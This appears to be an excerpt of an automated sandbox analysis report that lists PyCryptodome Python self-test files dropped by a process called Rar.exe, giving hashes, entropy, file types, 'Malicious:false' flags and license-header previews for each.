                                                                                                                                                                                                                                  SHA-256:1F840B622E7315C5C5A923D8454A5B9C66322CEB9D33B812CEC8A6D8761F4A2B
                                                                                                                                                                                                                                  SHA-512:A518551D6C8D48364F218255FCFF288F2E87D923939A7C1C1465620FB381C1275FE29F1C2453B20E37B3668D8C48E75BF2FA96A21BFE1725258FA80466FA76F6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15235
                                                                                                                                                                                                                                  Entropy (8bit):5.323832478101059
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Frskrs9VqnIKt8lvlU+h2ZerUbZttyZMkdZeU0ZpX/ZiemZEGaZp0LZ3Td7Zxmcd:Fr6qYlvlU+h20rUbvtyykd0U0HX/oemt
                                                                                                                                                                                                                                  MD5:017642671098D38A9921ADA7A0951DA8
                                                                                                                                                                                                                                  SHA1:BC9E4CE5AD8084B4738D143535069B07AE04AA2D
                                                                                                                                                                                                                                  SHA-256:5CBAA220B85562E5DB201B3A0C4A038053A89EADAA8D9E2E38E06EC5F5E91784
                                                                                                                                                                                                                                  SHA-512:7DD94737C18B9271F75387EFEC5A2EB91A9A5AEBE73B995AF5A17AC7D667B13C98CF29150DDADBEAF17F55C278207ACD8A56D9D8CE4BF428FC3006CD5AE0896A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with very long lines (320), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):52772
                                                                                                                                                                                                                                  Entropy (8bit):5.105714890735783
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:Hr6qZFk9ZlxJd1dlN5hjlszlyvlRjlAlBXlwtrFk/lxJdPlN5h+blszlyGlRjlAT:HrpUMitfqUFJe6Qk72tf4XC5Gb
                                                                                                                                                                                                                                  MD5:D4E0988F7D451B2B6947B897A28EE683
                                                                                                                                                                                                                                  SHA1:EC447FDC1938150BA061A2694D515AE4DA2E1BC6
                                                                                                                                                                                                                                  SHA-256:725530571C5F6A2A7A7DBE70CA01F0D98ACF58A28A7E756AB5112264B8A1671F
                                                                                                                                                                                                                                  SHA-512:DABB89CDA5304D7BEEC6DE652FCBC9B4379A1D5EB2A7769D5DEF4E2BDEFB52DDE9F40662480AFD29E7D92700057893376E399A2FA85EB36E4DF9FFE9393F0639
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8865
                                                                                                                                                                                                                                  Entropy (8bit):5.359617066604544
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:vQHvtdzhCrYVFr0PYwlVkOr8DDQVtBx2WnvBGr4:ve3h5VFEflVn8nQrBx2WnvF
                                                                                                                                                                                                                                  MD5:72679E90B28641849BF954433CD1E65D
                                                                                                                                                                                                                                  SHA1:9C879DF1BEF61E45270C49FAF745FD1A3D5D01BA
                                                                                                                                                                                                                                  SHA-256:DE68DD99C82D04F99B7A8DC246F9AA626B97AEBB0266D237B3F97212AC9A7F2F
                                                                                                                                                                                                                                  SHA-512:9383D3DB45A596462A3FD7F9AF9723AD451D0CA7CE2BEBB8C9364021623E5E85E505D9AD565C20BCB894A2FBBAF90566E947E044FC8C36A540C4F9BFAB0EBD48
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_ElGamal.py: Self-test for the ElGamal primitive..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12948
                                                                                                                                                                                                                                  Entropy (8bit):4.976023341221772
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:6wfFQHvo+oyHFCV2pK05i81ILA5204WVTHM8xTH8HS3z8Wdy8Lqe8ITy8By58GFu:6wdQHvtCV2Q0PSM56QTHgX+2BP8trZ
                                                                                                                                                                                                                                  MD5:32E053A4827566EF922022D85F245E73
                                                                                                                                                                                                                                  SHA1:6B0B7C6A5A55846EEF14E5B8E57EEBCFE79CA333
                                                                                                                                                                                                                                  SHA-256:C21A130AFCC95FE9C7399B96843457360412E2AF6F880502B9DA6961CFF05DD1
                                                                                                                                                                                                                                  SHA-512:2D1651C9DCF4063F7334BE051EBE23F792F08B4009F11A551D4B810C38DF4778CBFDA030B3F7039DB72F7598BBB90760D694172BC33660FB259F759E24903AB5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_RSA.py: Self-test for the RSA primitive..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTI
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with very long lines (606), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26063
                                                                                                                                                                                                                                  Entropy (8bit):5.815765795492079
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:OezqZSzvQgHHDsgPscoAeefBA7AACWzIOgrKF5ut4TiEhL6v:Fz9hHHDHsc3RaodKnutKhLs
                                                                                                                                                                                                                                  MD5:1F7E668CD0A3C46EC31C5CA5CBAD6BE2
                                                                                                                                                                                                                                  SHA1:530E5492A65FC6D0202FF2E734C1FCE0E03086D8
                                                                                                                                                                                                                                  SHA-256:AE72FF476A6EDF11F5C87833E61C3FA22B636FFD9A40BBA216DBE4EAAF375734
                                                                                                                                                                                                                                  SHA-512:31D17F6A4C7F9E6813F8C265D81EBF6D84B92494B037DA6CA341178FFD30671B8197349006A6E8D2E470143324CC6187391179639B9DC5C31904308E5BF49BAD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_import_DSA.py: Self-test for importing DSA keys..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):110530
                                                                                                                                                                                                                                  Entropy (8bit):4.785476957080907
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:HrxUZpU2MELKo95NgqKrXXPbu26KbkksYR29NnDT:6
                                                                                                                                                                                                                                  MD5:9AFABC2CBEE27CA96CFF6E39B6A71F59
                                                                                                                                                                                                                                  SHA1:D7FC53777C2E19578D912DFAEB264B75075D6ED4
                                                                                                                                                                                                                                  SHA-256:6D1D11ACC8627531DA1004DA3C769145C86132D3BCFC534C2C95316461F32483
                                                                                                                                                                                                                                  SHA-512:5F577A3D5AD96CEBF411E6F8B85A76D26D709A8A0233344C9F2C6D429E9F304E1085FAD8D2A50729521B52743F01CA3C5036CE824FF9C2A8F9A6B9DD099A0689
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27335
                                                                                                                                                                                                                                  Entropy (8bit):5.573317920900425
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:gee1Bv3eFHNXizsjs3FXiRZ3BnZ2+89emGHT2UoAsv0pv0Mvmg8Dab5DXTWHX/Ng:7e1xizNk+8QwlEdYdtdGd/
                                                                                                                                                                                                                                  MD5:F1E726C8D26E5A4EDD4F0E86D08A2DB4
                                                                                                                                                                                                                                  SHA1:882F48AD94D4650DF3EB8277B7ACB5559FA3FB0A
                                                                                                                                                                                                                                  SHA-256:4E24EC277328732141035B87E859DC566C037F7E41B64385E7C52342A85708BE
                                                                                                                                                                                                                                  SHA-512:077403C7FA352D037DF498DA84907A9F3245D5145000C58EA25FD848CB80999D52B10BA63F84AA6101136878FECBF8919F00E0BC8D4545C8972734F19F186E3A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_importKey.py: Self-test for importing RSA keys..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..#
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1581
                                                                                                                                                                                                                                  Entropy (8bit):5.226736646167872
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:lc+4470Gvw5hXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/Fl7SP8ryGN:N4GHwEIB0jcQHMsvI/S3oCFhS01raZa
                                                                                                                                                                                                                                  MD5:650B195DB914D00543FFC6282AEF4386
                                                                                                                                                                                                                                  SHA1:C12250DA69C867BF14B63D2B991A21D062C88241
                                                                                                                                                                                                                                  SHA-256:468CD14E0B72874B146C15413D0AA19B9D1CECE91D74924F5B746142CE14EE41
                                                                                                                                                                                                                                  SHA-512:4168A13930D6011BECBE65B9862B4146C65D8F3CE38CEEB6CC3AA57E332B8D08D2463FA3ABE285CF77AF706D75810FBD255D9FBDE3D57BC222A377F5C00C90D3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Random/__init__.py: Self-test for random number generation modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7157
                                                                                                                                                                                                                                  Entropy (8bit):4.828342299384293
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:nwdQHvwJya+isH+rAx7iX4DRyckzfYLyWENIX1dZ:nUewJya+isMAx7ioDRyLbiREWX9
                                                                                                                                                                                                                                  MD5:BC110BB6E2A2F78799CBA2E4A078B348
                                                                                                                                                                                                                                  SHA1:5EA96E99799846814665A161C23E80946B11EBD3
                                                                                                                                                                                                                                  SHA-256:8A94FE4391E4615B8FB5F4115830BD8ADDABB05CEF1E8F74F7BB9AE5F8E367F7
                                                                                                                                                                                                                                  SHA-512:96C5E94B3304520F626F031269CBB4BB6EB81DC57E00020865B0FBDEDBF0EBD8F3C21FF51B2BC2B737192FCA0A7E3922AC88F1D6473A4061C14D5B22DCF96D2C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/test_generic.py: Self-test for the Crypto.Random.new() function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1599
                                                                                                                                                                                                                                  Entropy (8bit):5.165215017196936
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:lc+J2w8yXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/Flw8ZB6uadPOy4:NpEIB0jcQHMsvI/S3oCFOOBzwQOaT
                                                                                                                                                                                                                                  MD5:083FC5F35EE0DF1EC53ECAC2C412FC84
                                                                                                                                                                                                                                  SHA1:354D57E8536552067A110B7BAB4DF8EE920528B1
                                                                                                                                                                                                                                  SHA-256:EE9D77A0F03E91170605EE5BBC1FDD351030504B68840E5D1AC87C688B2BDAED
                                                                                                                                                                                                                                  SHA-512:F03AC26A5574C2BC8F22A6FB6AAB894E1B757F58B95DF2391DC336CFBE7AB3BEFB0DAA8A8CB12135D0B42C3C225EBDC0F2BA98586F1F73744150372E6D77C9D8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Signature/__init__.py: Self-test for signature modules..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWA
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):58459
                                                                                                                                                                                                                                  Entropy (8bit):5.033274153315109
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:1r6q7FYGlGFjUYy2ItfrukaJx5jsZ/iNj+rYEZRlAjfbc:1rpjj2ySkaRjtNKrYO3
                                                                                                                                                                                                                                  MD5:DB184380CEA1F11904E6D14175913500
                                                                                                                                                                                                                                  SHA1:59480F2DBD08D734AC553B4D37CB6743DB5204E6
                                                                                                                                                                                                                                  SHA-256:D4C77C4DE539C4759000188159D73E22EED3997DC31D9244A6AAD476437D95BD
                                                                                                                                                                                                                                  SHA-512:2ADED52FF8E77B12FFDCA180072C7D3B73087C4BEF145A4167D12D8026AD32851EB6763627BE31D8F61361B51DB07654146CDD56B30AA611CF07C4DF89037ECA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# SelfTest/Signature/test_dss.py: Self-test for DSS signatures..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24708
                                                                                                                                                                                                                                  Entropy (8bit):4.928631305766138
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:6rskrs9VqV5QJGc/S6WOYs06PDk2Q6tE1yGWEFUtce47VIUbB:6r6q7qG+WO26TzGoVG7VNB
                                                                                                                                                                                                                                  MD5:885594421BDB74CB41BD212B07F2FE31
                                                                                                                                                                                                                                  SHA1:07853D9DF97033A47A5CA0290A7D23AD67DB6E62
                                                                                                                                                                                                                                  SHA-256:C9FF4BA5715303422A5E828AC80B8868C893255BD832C428F2DD369A169CA8FD
                                                                                                                                                                                                                                  SHA-512:12662D64C764654AE7066C87D632050D53507FF39778FEE3F6D5F4C6805EEDDC6C3267978FFD91E210887AF874C418C57D17756B983D73D47D132F4DD7E6D639
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,..# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUEN
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13889
                                                                                                                                                                                                                                  Entropy (8bit):5.0841198388491415
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IWGRc3Wgxxu1ndXxjTVXHYjBTetB4H/UObo5FrrQyEReRBRj6Dcr:0rskrs9Vqw2xxu1nvvZKcwjNW
                                                                                                                                                                                                                                  MD5:093398DDA0E59A51C5BF120896ECAF48
                                                                                                                                                                                                                                  SHA1:7BB7CBCEEAC65543DE8C869443335448261DFCF8
                                                                                                                                                                                                                                  SHA-256:30EF738E57068C05379B9E12B435A777B3FC0010935DE6BEFD01FA4C8C0C33E8
                                                                                                                                                                                                                                  SHA-512:59AB1A3CC7C0176991B062FFEA818A61D7D670DAF1C6CBC9C37CCD914785C53B7FC17A90D605306E55C744B59E8A5F7D643AB1935F23B86F317F1DD823FBFBAC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16188
                                                                                                                                                                                                                                  Entropy (8bit):5.334015326079158
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/ISmR/wgOLydIVOHScWJ8WuIWBExWaUYbIeDcYcOEtZ0RB2BZuOYc:0rskrs9Vq4/kbVUSdxpzcY6V5
                                                                                                                                                                                                                                  MD5:C3413892395D1B95715A94D5B15594F7
                                                                                                                                                                                                                                  SHA1:8D5566324873EB5BD0DF6DA4F43F4D23B443FDB0
                                                                                                                                                                                                                                  SHA-256:42CBEB606342C984B33629AA0C2D0FE9659A9518C8BB502E9AB7E23063DBE8FA
                                                                                                                                                                                                                                  SHA-512:5CC41F7ABDE76236C6CB3314DF824AC8947693A0273924D715771859CE0760A37553BC6554FE8B0B85DBA6F25516B024696E2DFBADFDDD0BB745F3DE855F45B6
                                                                                                                                                                                                                                  Malicious:false
